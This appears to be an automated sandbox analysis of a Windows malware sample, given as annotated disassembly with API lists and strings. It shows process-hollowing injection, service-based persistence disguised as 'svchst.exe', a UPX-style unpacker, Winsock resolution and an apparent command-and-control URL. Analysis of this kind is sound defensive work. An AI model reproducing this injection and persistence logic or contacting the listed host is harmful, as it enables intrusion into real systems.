00415925 call 00415760h
0041592A add esp, 0Ch
0041592D jmp 00415932h
0041592F mov eax, dword ptr [ebp-0Ch] xrefs 00415884, 00415893
00415932 mov esp, ebp xrefs 0041592D
00415934 pop ebp
00415935 ret function end
APIs
    • CreateProcessA.KERNEL32, ref: 004144EA
    • VirtualAllocEx.KERNEL32, ref: 00414516
    • WriteProcessMemory.KERNEL32, ref: 00414546
    • SetThreadContext.KERNEL32, ref: 0041456A
    • ResumeThread.KERNEL32, ref: 00414586
  • NtUnmapViewOfSection.NTDLL, ref: 0041430D
Address Instruction Meta Information
00414290 push ebp xrefs 004149BA
00414291 mov ebp, esp
00414293 sub esp, 00000348h
00414299 lea eax, dword ptr [ebp-00000340h]
0041429F push eax
004142A0 call 00414430h
004142A5 push eax
004142A6 call 00414450h
004142AB lea ecx, dword ptr [ebp-58h]
004142AE push ecx
004142AF call 00414470h
004142B4 mov edx, dword ptr [ebp+0Ch]
004142B7 mov dword ptr [ebp-68h], edx
004142BA mov eax, dword ptr [ebp-68h]
004142BD mov dword ptr [ebp-00000344h], eax
004142C3 mov ecx, dword ptr [ebp-00000344h]
004142C9 mov edx, dword ptr [ebp-68h]
004142CC add edx, dword ptr [ecx+3Ch]
004142CF mov dword ptr [ebp-64h], edx
004142D2 mov eax, dword ptr [ebp-64h]
004142D5 mov ecx, dword ptr [eax+34h]
004142D8 mov dword ptr [ebp-5Ch], ecx
004142DB mov edx, dword ptr [ebp-64h]
004142DE mov eax, dword ptr [edx+28h]
004142E1 mov dword ptr [ebp-6Ch], eax
004142E4 lea ecx, dword ptr [ebp-10h]
004142E7 push ecx
004142E8 lea edx, dword ptr [ebp-58h]
004142EB push edx
004142EE push 00000000h Count = 2
004142F0 push 00000024h
004142F6 push 00000000h Count = 3
004142F8 call 00414490h
004142FD push eax
004142FE push 00000000h
00414300 call 004144B0h
00414305 mov eax, dword ptr [ebp-5Ch]
00414308 push eax
00414309 mov ecx, dword ptr [ebp-10h]
0041430C push ecx
0041430D call dword ptr [00401070h] NtUnmapViewOfSection@NTDLL.DLL (Import)
00414313 push 00000004h
00414315 push 00003000h
0041431A mov edx, dword ptr [ebp-64h]
0041431D mov eax, dword ptr [edx+50h]
00414320 push eax
00414321 mov ecx, dword ptr [ebp-5Ch]
00414324 push ecx
00414325 mov edx, dword ptr [ebp-10h]
00414328 push edx
00414329 call 004144F0h
0041432E push 00000000h
00414330 mov eax, dword ptr [ebp-64h]
00414333 mov ecx, dword ptr [eax+54h]
00414336 push ecx
00414337 mov edx, dword ptr [ebp-68h]
0041433A push edx
0041433B mov eax, dword ptr [ebp-5Ch]
0041433E push eax
0041433F mov ecx, dword ptr [ebp-10h]
00414342 push ecx
00414343 call 00414520h
00414348 mov dword ptr [ebp-00000348h], 00000000h
00414352 jmp 00414363h
00414354 mov edx, dword ptr [ebp-00000348h] xrefs 004143B9
0041435A add edx, 01h
0041435D mov dword ptr [ebp-00000348h], edx
00414363 mov eax, dword ptr [ebp-64h] xrefs 00414352
00414366 movzx ecx, word ptr [eax+06h]
0041436A cmp dword ptr [ebp-00000348h], ecx
00414370 jnl 004143BBh
00414372 mov edx, dword ptr [ebp-00000344h]
00414378 mov eax, dword ptr [edx+3Ch]
0041437B mov ecx, dword ptr [ebp-68h]
0041437E lea edx, dword ptr [ecx+eax+000000F8h]
00414385 mov eax, dword ptr [ebp-00000348h]
0041438B imul eax, eax, 28h
0041438E add edx, eax
00414390 mov dword ptr [ebp-60h], edx
00414393 push 00000000h
00414395 mov ecx, dword ptr [ebp-60h]
00414398 mov edx, dword ptr [ecx+10h]
0041439B push edx
0041439C mov eax, dword ptr [ebp-60h]
0041439F mov ecx, dword ptr [ebp-68h]
004143A2 add ecx, dword ptr [eax+14h]
004143A5 push ecx
004143A6 mov edx, dword ptr [ebp-60h]
004143A9 mov eax, dword ptr [ebp-5Ch]
004143AC add eax, dword ptr [edx+0Ch]
004143AF push eax
004143B0 mov ecx, dword ptr [ebp-10h]
004143B3 push ecx
004143B4 call 00414520h
004143B9 jmp 00414354h
004143BB mov dword ptr [ebp-00000340h], 00010002h xrefs 00414370
004143C5 lea edx, dword ptr [ebp-00000340h]
004143CB push edx
004143CC mov eax, dword ptr [ebp-0Ch]
004143CF push eax
004143D0 call 00414450h
004143D5 push 00000000h
004143D7 push 00000004h
004143D9 lea ecx, dword ptr [ebp-5Ch]
004143DC push ecx
004143DD mov edx, dword ptr [ebp-0000029Ch]
004143E3 add edx, 08h
004143E6 push edx
004143E7 mov eax, dword ptr [ebp-10h]
004143EA push eax
004143EB call 00414520h
004143F0 mov ecx, dword ptr [ebp-5Ch]
004143F3 add ecx, dword ptr [ebp-6Ch]
004143F6 mov dword ptr [ebp-00000290h], ecx
004143FC lea edx, dword ptr [ebp-00000340h]
00414402 push edx
00414403 mov eax, dword ptr [ebp-0Ch]
00414406 push eax
00414407 call 00414550h
0041440C mov ecx, dword ptr [ebp-0Ch]
0041440F push ecx
00414410 call 00414570h
00414415 mov edx, dword ptr [ebp-68h]
00414418 push edx
00414419 call 00413F70h
0041441E push FFFFFFFFh
00414420 mov eax, dword ptr [ebp-10h]
00414423 push eax
00414424 call 00414590h
00414429 mov esp, ebp
0041442B pop ebp
0041442C ret function end
APIs
  • HeapAlloc.KERNEL32, ref: 00415FFE
Address Instruction Meta Information
00415FF2 push dword ptr [esp+04h] xrefs 004145B9, 0041624E
00415FF6 push 00000000h
00415FF8 push dword ptr [00418CE0h]
00415FFE call dword ptr [00401000h] HeapAlloc@KERNEL32.DLL (Import)
00416004 ret function end
APIs
  • GetProcessHeap.KERNEL32, ref: 004161F3
Address Instruction Meta Information
004161F3 call dword ptr [00401018h] GetProcessHeap@KERNEL32.DLL (Import)
004161F9 xor ecx, ecx
004161FB test eax, eax
004161FD sete cl
00416200 mov dword ptr [00418CE0h], eax
00416205 mov eax, ecx
00416207 ret function end
Address Instruction Meta Information
004145F0 push ebp xrefs 00414675
004145F1 mov ebp, esp
004145F3 push ecx
004145F4 mov eax, dword ptr [ebp+0Ch]
004145F7 push eax
004145F8 call 004145B0h
004145FD add esp, 04h
00414600 mov dword ptr [ebp-04h], eax
00414603 mov ecx, dword ptr [ebp+08h]
00414606 push ecx
00414607 mov edx, dword ptr [ebp-04h]
0041460A push edx
0041460B call 00416005h
00414610 add esp, 08h
00414613 push 00000004h
00414615 push 00000000h
00414617 mov eax, dword ptr [ebp-04h]
0041461A push eax
0041461B call 00414A00h
00414620 mov esp, ebp
00414622 pop ebp
00414623 ret function end
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • FindClose.KERNEL32, ref: 00414216
Address Instruction Meta Information
00414200 push ebp xrefs 00413EC5
00414201 mov ebp, esp
00414203 mov eax, dword ptr [ebp+08h]
00414206 push eax
00414207 push 6B5366BEh
0041420C push 7B4842C1h
00414211 call 00415E40h
00414216 call eax FindClose@KERNEL32.DLL (Hidden Import)
00414218 pop ebp
00414219 retn 0004h function end
Executed Functions
APIs
    • GetModuleHandleA.KERNEL32, ref: 00406044
    • QueryPerformanceCounter.KERNEL32, ref: 00402A20
    • GetTickCount.KERNEL32, ref: 00402A34
    • SHGetSpecialFolderPathA.SHELL32, ref: 00421CEF
    • GetCommandLineA.KERNEL32, ref: 004029F2
    • OpenSCManagerA.ADVAPI32, ref: 00429AC4
    • CreateServiceA.ADVAPI32, ref: 00429AF5
    • CloseServiceHandle.ADVAPI32, ref: 00429AFD
    • OpenServiceA.ADVAPI32, ref: 00429B39
    • StartServiceA.ADVAPI32, ref: 00429B4D
    • QueryServiceStatus.ADVAPI32, ref: 00429B5C
  • CopyFileA.KERNEL32, ref: 00429EBB
  • StartServiceCtrlDispatcherA.ADVAPI32, ref: 00429F02
Strings
  • Host Generic Process, va: 00429F38
  • Host Generic Process for Win32 Services, va: 00429F74
  • \svchst.exe, va: 00429FB0
  • http://mahaajan.in/dd/diwar.php, va: 0042A000
Address Instruction Meta Information
00429D88 push ebp
00429D89 mov ebp, esp
00429D8B mov ecx, 00000005h
00429D92 push 00000000h Count = 2
00429D94 dec ecx
00429D95 jne 00429D90h
00429D97 push ecx
00429D98 push ebx
00429D99 mov eax, 00429CC0h
00429D9E call 00406038h
00429DA3 xor eax, eax
00429DA5 push ebp
00429DA6 push 00429F22h
00429DAB push dword ptr fs:[eax]
00429DAE mov dword ptr fs:[eax], esp
00429DB1 call 00402A1Ch
00429DB6 mov eax, 0042DA9Ch
00429DBB mov edx, 00429F38h ASCII "Host Generic Process"
00429DC0 call 00404430h
00429DC5 mov eax, 0042DAA0h
00429DCA mov edx, 00429F74h ASCII "Host Generic Process for Win32 Services"
00429DCF call 00404430h
00429DD4 mov eax, 0042DAA4h
00429DD9 mov edx, 00429FB0h ASCII "\svchst.exe"
00429DDE call 00404430h
00429DE3 mov eax, 0042DA88h
00429DE8 mov edx, 0042A000h ASCII "http://mahaajan.in/dd/diwar.php"
00429DED call 00404430h
00429DF2 lea edx, dword ptr [ebp-14h]
00429DF5 mov eax, dword ptr [0042DA9Ch] 00000000
00429DFA call 00429BACh
00429DFF mov edx, dword ptr [ebp-14h]
00429E02 mov eax, 0042DA9Ch
00429E07 call 00404430h
00429E0C lea edx, dword ptr [ebp-18h]
00429E0F mov eax, dword ptr [0042DAA0h] 00000000
00429E14 call 00429BACh
00429E19 mov edx, dword ptr [ebp-18h]
00429E1C mov eax, 0042DAA0h
00429E21 call 00404430h
00429E26 lea edx, dword ptr [ebp-1Ch]
00429E29 mov eax, dword ptr [0042DAA4h] 00961D84
00429E2E call 00429BACh
00429E33 mov edx, dword ptr [ebp-1Ch]
00429E36 mov eax, 0042DAA4h
00429E3B call 00404430h
00429E40 mov eax, dword ptr [0042DA88h] 00000000
00429E45 call 00404878h
00429E4A mov edx, eax
00429E4C lea eax, dword ptr [ebp-24h]
00429E4F call 004045D4h
00429E54 mov eax, dword ptr [ebp-24h]
00429E57 lea edx, dword ptr [ebp-20h]
00429E5A call 00429BACh
00429E5F mov edx, dword ptr [ebp-20h]
00429E62 mov eax, 0042DA88h
00429E67 call 00404430h
00429E6C lea edx, dword ptr [ebp-28h]
00429E6F mov ax, 0024h
00429E73 call 00421CB8h
00429E78 mov edx, dword ptr [ebp-28h]
00429E7B mov eax, 0042DAA8h
00429E80 mov ecx, dword ptr [0042DAA4h] 00961D84
00429E86 call 004046C4h
00429E8B mov eax, dword ptr [0042DAA8h] 00961F30
00429E90 call 00407978h
00429E95 test al, al
00429E97 jne 00429EE4h
00429E99 push FFFFFFFFh
00429E9B mov eax, dword ptr [0042DAA8h] 00961F30
00429EA0 call 00404878h
00429EA5 mov ebx, eax
00429EA7 push ebx
00429EA8 lea edx, dword ptr [ebp-2Ch]
00429EAB xor eax, eax
00429EAD call 004029BCh
00429EB2 mov eax, dword ptr [ebp-2Ch]
00429EB5 call 00404878h
00429EBA push eax
00429EBB call 004060FCh CopyFileA@KERNEL32.DLL (Hidden Import)
00429EC0 mov eax, dword ptr [0042DA9Ch] 00000000
00429EC5 call 00404878h
00429ECA push eax
00429ECB mov eax, ebx
00429ECD pop edx
00429ECE call 00429AB4h
00429ED3 mov eax, dword ptr [0042DA9Ch] 00000000
00429ED8 call 00404878h
00429EDD call 00429B14h
00429EE2 jmp 00429F07h
00429EE4 mov eax, dword ptr [0042DA9Ch] 00000000 xrefs 00429E97
00429EE9 call 00404878h
00429EEE mov dword ptr [0042CA98h], eax
00429EF3 mov dword ptr [0042CA9Ch], 00429A0Ch
00429EFD push 0042CA98h
00429F02 call 00421B7Ch StartServiceCtrlDispatcherA@ADVAPI32.DLL (Hidden Import)
00429F07 xor eax, eax xrefs 00429EE2
00429F09 pop edx
00429F0B pop ecx Count = 2
00429F0C mov dword ptr fs:[eax], edx
00429F0F push 00429F29h
00429F14 lea eax, dword ptr [ebp-2Ch] xrefs 00429F27
00429F17 mov edx, 00000007h
00429F1C call 00404400h
00429F21 ret function end
APIs
  • VirtualAlloc.KERNEL32, ref: 0040154F
Address Instruction Meta Information
00401520 push ebx xrefs 00401824
00401521 push esi
00401522 push edi
00401523 mov ebx, edx
00401525 mov esi, eax
00401527 cmp esi, 00100000h
0040152D jnl 00401536h
0040152F mov esi, 00100000h
00401534 jmp 00401542h
00401536 add esi, 0000FFFFh xrefs 0040152D
0040153C and esi, FFFF0000h
00401542 mov dword ptr [ebx+04h], esi xrefs 00401534
00401545 push 00000001h
00401547 push 00002000h
0040154C push esi
0040154D push 00000000h
0040154F call 0040134Ch VirtualAlloc@KERNEL32.DLL (Import)
00401554 mov edi, eax
00401556 mov dword ptr [ebx], edi
00401558 test edi, edi
0040155A je 0040157Fh
0040155C mov edx, ebx
0040155E mov eax, 0042C5E4h
00401563 call 004013D4h
00401568 test al, al
0040156A jne 0040157Fh
0040156C push 00008000h
00401571 push 00000000h
00401573 mov eax, dword ptr [ebx]
00401575 push eax
00401576 call 00401354h
0040157B xor eax, eax
0040157D mov dword ptr [ebx], eax
0040157F pop edi xrefs 0040155A, 0040156A
00401580 pop esi
00401581 pop ebx
00401582 ret function end
APIs
  • FindFirstFileA.KERNEL32, ref: 0040792B
  • FindClose.KERNEL32, ref: 00407936
  • FileTimeToLocalFileTime.KERNEL32, ref: 0040794F
  • FileTimeToDosDateTime.KERNEL32, ref: 00407960
Address Instruction Meta Information
00407910 push ebp xrefs 0040797D
00407911 mov ebp, esp
00407913 add esp, FFFFFEB4h
00407919 push ebx
0040791A mov ebx, eax
0040791C lea eax, dword ptr [ebp-0000014Ch]
00407922 push eax
00407923 mov eax, ebx
00407925 call 00404878h
0040792A push eax
0040792B call 00406144h FindFirstFileA@KERNEL32.DLL (Hidden Import)
00407930 cmp eax, FFFFFFFFh
00407933 je 00407969h
00407935 push eax
00407936 call 0040613Ch FindClose@KERNEL32.DLL (Hidden Import)
0040793B test byte ptr [ebp-0000014Ch], 00000010h
00407942 jne 00407969h
00407944 lea eax, dword ptr [ebp-0Ch]
00407947 push eax
00407948 lea eax, dword ptr [ebp-00000138h]
0040794E push eax
0040794F call 00406134h FileTimeToLocalFileTime@KERNEL32.DLL (Hidden Import)
00407954 lea eax, dword ptr [ebp-04h]
00407957 push eax
00407958 lea eax, dword ptr [ebp-02h]
0040795B push eax
0040795C lea eax, dword ptr [ebp-0Ch]
0040795F push eax
00407960 call 0040612Ch FileTimeToDosDateTime@KERNEL32.DLL (Hidden Import)
00407965 test eax, eax
00407967 jne 00407970h
00407969 mov dword ptr [ebp-04h], FFFFFFFFh xrefs 00407933, 00407942
00407970 mov eax, dword ptr [ebp-04h] xrefs 00407967
00407973 pop ebx
00407974 mov esp, ebp
00407976 pop ebp
00407977 ret function end
APIs
  • OpenSCManagerA.ADVAPI32, ref: 00429AC4
  • CreateServiceA.ADVAPI32, ref: 00429AF5
  • CloseServiceHandle.ADVAPI32, ref: 00429AFD
Address Instruction Meta Information
00429AB4 push ebx xrefs 00429ECE
00429AB5 push esi
00429AB6 push edi
00429AB7 push ebp
00429AB8 mov ebp, edx
00429ABA mov edi, eax
00429ABC xor ebx, ebx
00429ABE push 00000002h
00429AC2 push 00000000h Count = 2
00429AC4 call 00421BC4h OpenSCManagerA@ADVAPI32.DLL (Hidden Import)
00429AC9 mov esi, eax
00429ACB test esi, esi
00429ACD je 00429B0Ch
00429AD7 push 00000000h Count = 5
00429AD9 push edi
00429ADA push 00000001h
00429ADC push 00000002h
00429ADE push 00000110h
00429AE3 push 000F0000h
00429AE8 mov eax, dword ptr [0042DAA0h] 00000000
00429AED call 00404878h
00429AF2 push eax
00429AF3 push ebp
00429AF4 push esi
00429AF5 call 00421BCCh CreateServiceA@ADVAPI32.DLL (Hidden Import)
00429AFA mov ebx, eax
00429AFC push esi
00429AFD call 00421B64h CloseServiceHandle@ADVAPI32.DLL (Hidden Import)
00429B02 test ebx, ebx
00429B04 je 00429B0Ah
00429B06 mov bl, 01h
00429B08 jmp 00429B0Ch
00429B0A xor ebx, ebx xrefs 00429B04
00429B0C mov eax, ebx xrefs 00429ACD, 00429B08
00429B0E pop ebp
00429B0F pop edi
00429B10 pop esi
00429B11 pop ebx
00429B12 ret function end
APIs
  • FreeLibrary.KERNEL32, ref: 004042ED
  • GetStdHandle.KERNEL32, ref: 00404215
  • WriteFile.KERNEL32, ref: 0040421B
  • MessageBoxA.USER32, ref: 00404254
  • ExitProcess.KERNEL32, ref: 00404322
Address Instruction Meta Information
00404268 push ebx xrefs 00404345
00404269 push esi
0040426A push edi
0040426B push ebp
0040426C mov ebx, 0042C630h
00404271 mov esi, 0042B000h
00404276 mov edi, 0042C040h
0040427B cmp byte ptr [ebx+28h], 00000000h
0040427F jne 00404297h
00404281 cmp dword ptr [edi], 00000000h
00404284 je 00404297h
00404286 mov edx, dword ptr [edi] xrefs 00404295
00404288 mov eax, edx
0040428A xor edx, edx
0040428C mov dword ptr [edi], edx
0040428E mov ebp, eax
00404290 call ebp
00404292 cmp dword ptr [edi], 00000000h
00404295 jne 00404286h
00404297 cmp dword ptr [0042B004h], 00000000h xrefs 0040427F, 00404284
0040429E je 004042B1h
004042A0 call 00404150h
004042A5 call 004041DCh
004042AA xor eax, eax
004042AC mov dword ptr [0042B004h], eax
004042B1 cmp byte ptr [ebx+28h], 00000002h xrefs 0040429E, 00404336
004042B5 jne 004042C1h
004042B7 cmp dword ptr [esi], 00000000h
004042BA jne 004042C1h
004042BC xor eax, eax
004042BE mov dword ptr [ebx+0Ch], eax
004042C1 call 00404004h xrefs 004042B5, 004042BA
004042C6 cmp byte ptr [ebx+28h], 00000001h
004042CA jbe 004042D1h
004042CC cmp dword ptr [esi], 00000000h
004042CF je 004042F2h
004042D1 mov eax, dword ptr [ebx+10h] xrefs 004042CA
004042D4 test eax, eax
004042D6 je 004042F2h
004042D8 call 00405888h
004042DD mov edx, dword ptr [ebx+10h]
004042E0 mov eax, dword ptr [edx+10h]
004042E3 cmp eax, dword ptr [edx+04h]
004042E6 je 004042F2h
004042E8 test eax, eax
004042EA je 004042F2h
004042EC push eax
004042ED call 00401238h FreeLibrary@KERNEL32.DLL (Hidden Import)
004042F2 call 00403FDCh xrefs 004042D6, 004042CF, 004042E6, 004042EA
004042F7 cmp byte ptr [ebx+28h], 00000001h
004042FB jne 00404300h
004042FD call dword ptr [ebx+24h]
00404300 cmp byte ptr [ebx+28h], 00000000h xrefs 004042FB
00404304 je 0040430Bh
00404306 call 004041ACh
0040430B cmp dword ptr [ebx], 00000000h xrefs 00404304
0040430E jne 00404327h
00404310 cmp dword ptr [0042C024h], 00000000h
00404317 je 0040431Fh
00404319 call dword ptr [0042C024h]
0040431F mov eax, dword ptr [esi] xrefs 00404317
00404321 push eax
00404322 call 00401218h ExitProcess@KERNEL32.DLL (Import)
00404327 mov eax, dword ptr [ebx] xrefs 0040430E
00404329 push esi
0040432A mov esi, eax
0040432C mov edi, ebx
0040432E mov ecx, 0000000Bh
00404333 rep movsd
00404335 pop esi
00404336 jmp 004042B1h
APIs
  • LoadLibraryA.KERNEL32, ref: 00437CDA
  • GetProcAddress.KERNEL32, ref: 00437CEF
  • ExitProcess.KERNEL32, ref: 00437D00
  • VirtualProtect.KERNEL32, ref: 00437D1D
  • VirtualProtect.KERNEL32, ref: 00437D32
Strings
  • ble; MSIE 6.0; Windows NT 5.1; StumbleUpon.com 1.760; .NET CLR 1.1.4322) , va: 00426000
Address Instruction Meta Information
00437BB0 pushad
00437BB1 mov esi, 00426000h ASCII "ble; MSIE 6.0; Windows NT 5.1; StumbleUpon.com 1.760; .NET CLR 1.1.4322) "
00437BB6 lea edi, dword ptr [esi-00025000h]
00437BBC mov dword ptr [edi+0002A0C4h], 7D9D6338h
00437BC6 push edi
00437BC7 or ebp, FFFFFFFFh
00437BCA jmp 00437BDAh
00437BD0 mov al, byte ptr [esi] xrefs 00437BE1
00437BD2 inc esi
00437BD3 mov byte ptr [edi], al
00437BD5 inc edi
00437BD6 add ebx, ebx xrefs 00437C85, 00437C6E
00437BD8 jne 00437BE1h
00437BDA mov ebx, dword ptr [esi] xrefs 00437BCA
00437BDC sub esi, FFFFFFFCh
00437BDF adc ebx, ebx
00437BE1 jc 00437BD0h xrefs 00437BD8
00437BE3 mov eax, 00000001h
00437BE8 add ebx, ebx xrefs 00437BF7, 00437C02
00437BEA jne 00437BF3h
00437BEC mov ebx, dword ptr [esi]
00437BEE sub esi, FFFFFFFCh
00437BF1 adc ebx, ebx
00437BF3 adc eax, eax xrefs 00437BEA
00437BF5 add ebx, ebx
00437BF7 jnc 00437BE8h
00437BF9 jne 00437C04h
00437BFB mov ebx, dword ptr [esi]
00437BFD sub esi, FFFFFFFCh
00437C00 adc ebx, ebx
00437C02 jnc 00437BE8h
00437C04 xor ecx, ecx xrefs 00437BF9
00437C06 sub eax, 03h
00437C09 jc 00437C18h
00437C0B shl eax, 08h
00437C0E mov al, byte ptr [esi]
00437C10 inc esi
00437C11 xor eax, FFFFFFFFh
00437C14 je 00437C8Ah
00437C16 mov ebp, eax
00437C18 add ebx, ebx xrefs 00437C09
00437C1A jne 00437C23h
00437C1C mov ebx, dword ptr [esi]
00437C1E sub esi, FFFFFFFCh
00437C21 adc ebx, ebx
00437C23 adc ecx, ecx xrefs 00437C1A
00437C25 add ebx, ebx
00437C27 jne 00437C30h
00437C29 mov ebx, dword ptr [esi]
00437C2B sub esi, FFFFFFFCh
00437C2E adc ebx, ebx
00437C30 adc ecx, ecx xrefs 00437C27
00437C32 jne 00437C54h
00437C34 inc ecx
00437C35 add ebx, ebx xrefs 00437C44, 00437C4F
00437C37 jne 00437C40h
00437C39 mov ebx, dword ptr [esi]
00437C3B sub esi, FFFFFFFCh
00437C3E adc ebx, ebx
00437C40 adc ecx, ecx xrefs 00437C37
00437C42 add ebx, ebx
00437C44 jnc 00437C35h
00437C46 jne 00437C51h
00437C48 mov ebx, dword ptr [esi]
00437C4A sub esi, FFFFFFFCh
00437C4D adc ebx, ebx
00437C4F jnc 00437C35h
00437C51 add ecx, 02h xrefs 00437C46
00437C54 cmp ebp, FFFFF300h xrefs 00437C32
00437C5A adc ecx, 01h
00437C5D lea edx, dword ptr [edi+ebp]
00437C60 cmp ebp, FFFFFFFCh
00437C63 jbe 00437C74h
00437C65 mov al, byte ptr [edx] xrefs 00437C6C
00437C67 inc edx
00437C68 mov byte ptr [edi], al
00437C6A inc edi
00437C6B dec ecx
00437C6C jne 00437C65h
00437C6E jmp 00437BD6h
00437C74 mov eax, dword ptr [edx] xrefs 00437C63, 00437C81
00437C76 add edx, 04h
00437C79 mov dword ptr [edi], eax
00437C7B add edi, 04h
00437C7E sub ecx, 04h
00437C81 jnbe 00437C74h
00437C83 add edi, ecx
00437C85 jmp 00437BD6h
00437C8A pop esi xrefs 00437C14
00437C8B mov edi, esi
00437C8D mov ecx, 000014D0h
00437C92 mov al, byte ptr [edi] xrefs 00437C99, 00437C9E
00437C94 inc edi
00437C95 sub al, E8h
00437C97 cmp al, 01h xrefs 00437CBC
00437C99 jnbe 00437C92h
00437C9B cmp byte ptr [edi], 00000011h
00437C9E jne 00437C92h
00437CA0 mov eax, dword ptr [edi]
00437CA2 mov bl, byte ptr [edi+04h]
00437CA5 shr ax, 0008h
00437CA9 rol eax, 10h
00437CAC xchg ah, al
00437CAE sub eax, edi
00437CB0 sub bl, FFFFFFE8h
00437CB3 add eax, esi
00437CB5 mov dword ptr [edi], eax
00437CB7 add edi, 05h
00437CBA mov al, bl
00437CBC loop 00437C97h
00437CBE lea edi, dword ptr [esi+00035000h]
00437CC4 mov eax, dword ptr [edi] xrefs 00437CE6
00437CC6 or eax, eax
00437CC8 je 00437D06h
00437CCA mov ebx, dword ptr [edi+04h]
00437CCD lea eax, dword ptr [eax+esi+00037218h]
00437CD4 add ebx, esi
00437CD6 push eax
00437CD7 add edi, 08h
00437CDA call dword ptr [esi+00037290h] LoadLibraryA@KERNEL32.DLL (Import)
00437CE0 xchg eax, ebp
00437CE1 mov al, byte ptr [edi] xrefs 00437CFE
00437CE3 inc edi
00437CE4 or al, al
00437CE6 je 00437CC4h
00437CE8 mov ecx, edi
00437CEA push edi
00437CEB dec eax
00437CEC repne scasb
00437CEE push ebp
00437CEF call dword ptr [esi+00037294h] GetProcAddress@KERNEL32.DLL (Import)
00437CF5 or eax, eax
00437CF7 je 00437D00h
00437CF9 mov dword ptr [ebx], eax
00437CFB add ebx, 04h
00437CFE jmp 00437CE1h
00437D00 call dword ptr [esi+000372A4h] ExitProcess@KERNEL32.DLL (Import) xrefs 00437CF7
00437D06 mov ebp, dword ptr [esi+00037298h] VirtualProtect@KERNEL32.DLL (Import) xrefs 00437CC8
00437D0C lea edi, dword ptr [esi-00001000h]
00437D12 mov ebx, 00001000h
00437D17 push eax
00437D18 push esp
00437D19 push 00000004h
00437D1B push ebx
00437D1C push edi
00437D1D call ebp VirtualProtect@KERNEL32.DLL (Import)
00437D1F lea eax, dword ptr [edi+0000021Fh]
00437D25 and byte ptr [eax], 0000007Fh
00437D28 and byte ptr [eax+28h], 0000007Fh
00437D2C pop eax
00437D2D push eax
00437D2E push esp
00437D2F push eax
00437D30 push ebx
00437D31 push edi
00437D32 call ebp VirtualProtect@KERNEL32.DLL (Import)
00437D34 pop eax
00437D35 popad
00437D36 lea eax, dword ptr [esp-80h]
00437D3A push 00000000h xrefs 00437D3E
00437D3C cmp esp, eax
00437D3E jne 00437D3Ah
00437D40 sub esp, FFFFFF80h
00437D43 jmp 00429D88h swap point
Address Instruction Meta Information
004016B4 push ebx xrefs 004017F5, 0040193E
004016B5 push esi
004016B6 push edi
004016B7 push ebp
004016B8 add esp, FFFFFFF4h
004016BB mov dword ptr [esp+04h], ecx
004016BF mov dword ptr [esp], edx
004016C2 mov edx, eax
004016C4 mov ebp, edx
004016C6 and ebp, FFFFF000h
004016CC add edx, dword ptr [esp]
004016CF add edx, 00000FFFh
004016D5 and edx, FFFFF000h
004016DB mov dword ptr [esp+08h], edx
004016DF mov eax, dword ptr [esp+04h]
004016E3 mov dword ptr [eax], ebp
004016E5 mov eax, dword ptr [esp+08h]
004016E9 sub eax, ebp
004016EB mov edx, dword ptr [esp+04h]
004016EF mov dword ptr [edx+04h], eax
004016F2 mov esi, dword ptr [0042C5E4h] 0042C5E4
004016F8 jmp 00401736h
004016FA mov ebx, dword ptr [esi+08h] xrefs 0040173C
004016FD mov edi, dword ptr [esi+0Ch]
00401700 add edi, ebx
00401702 cmp ebp, ebx
00401704 jbe 00401708h
00401706 mov ebx, ebp
00401708 cmp edi, dword ptr [esp+08h] xrefs 00401704
0040170C jbe 00401712h
0040170E mov edi, dword ptr [esp+08h]
00401712 cmp edi, ebx xrefs 0040170C
00401714 jbe 00401734h
00401716 push 00000004h
00401718 push 00001000h
0040171D sub edi, ebx
0040171F push edi
00401720 push ebx
00401721 call 0040134Ch
00401726 test eax, eax
00401728 jne 00401734h
0040172A mov eax, dword ptr [esp+04h]
0040172E xor edx, edx
00401730 mov dword ptr [eax], edx
00401732 jmp 0040173Eh
00401734 mov esi, dword ptr [esi] xrefs 00401714, 00401728
00401736 cmp esi, 0042C5E4h xrefs 004016F8
0040173C jne 004016FAh
0040173E add esp, 0Ch xrefs 00401732
00401741 pop ebp
00401742 pop edi
00401743 pop esi
00401744 pop ebx
00401745 ret function end
APIs
  • LoadLibraryA.KERNEL32, ref: 004146EF
Strings
  • WSAIoctl, va: 00414AC8
  • __WSAFDIsSet, va: 00414AD4
  • closesocket, va: 00414AE4
  • ioctlsocket, va: 00414AF0
  • WSAGetLastError, va: 00414AFC
  • WSAStartup, va: 00414B0C
  • WSACleanup, va: 00414B18
  • accept, va: 00414B24
  • bind, va: 00414B2C
  • connect, va: 00414B34
  • getpeername, va: 00414B3C
  • getsockname, va: 00414B48
  • getsockopt, va: 00414B54
  • htonl, va: 00414B60
  • htons, va: 00414B68
  • inet_addr, va: 00414B70
  • inet_ntoa, va: 00414B7C
  • listen, va: 00414B88
  • ntohl, va: 00414B90
  • ntohs, va: 00414B98
  • recv, va: 00414BA0
  • recvfrom, va: 00414BA8
  • select, va: 00414BB4
  • send, va: 00414BBC
  • sendto, va: 00414BC4
  • setsockopt, va: 00414BCC
  • shutdown, va: 00414BD8
  • socket, va: 00414BE4
  • gethostbyaddr, va: 00414BEC
  • gethostbyname, va: 00414BFC
  • getprotobyname, va: 00414C0C
  • getprotobynumber, va: 00414C1C
  • getservbyname, va: 00414C30
  • getservbyport, va: 00414C40
  • gethostname, va: 00414C50
  • getaddrinfo, va: 00414C5C
  • freeaddrinfo, va: 00414C68
  • getnameinfo, va: 00414C78
  • wship6.dll, va: 00414C84
  • ws2_32.dll, va: 00414ABC
Address Instruction Meta Information
00414670 push ebp
00414671 mov ebp, esp
00414673 add esp, FFFFFFF8h
00414676 push ebx
00414677 mov dword ptr [ebp-04h], eax
0041467A mov eax, dword ptr [ebp-04h]
0041467D call 00404868h
00414682 mov ebx, 0042B464h
00414687 xor eax, eax
00414689 push ebp
0041468A push 00414AA2h
0041468F push dword ptr fs:[eax]
00414692 mov dword ptr fs:[eax], esp
00414695 mov byte ptr [ebp-05h], 00000000h
00414699 mov byte ptr [0042C8A8h], 00000000h
004146A0 cmp dword ptr [ebp-04h], 00000000h
004146A4 jne 004146B3h
004146A6 lea eax, dword ptr [ebp-04h]
004146A9 mov edx, 00414ABCh ASCII "ws2_32.dll"
004146AE call 00404474h
004146B3 mov eax, dword ptr [0042C8A4h] 00960A4C xrefs 004146A4
004146B8 call 00413914h
004146BD xor eax, eax
004146BF push ebp
004146C0 push 00414A85h
004146C5 push dword ptr fs:[eax]
004146C8 mov dword ptr fs:[eax], esp
004146CB cmp dword ptr [0042B460h], 00000000h
004146D2 jne 00414A5Dh
004146D8 mov byte ptr [0042C8A8h], 00000000h
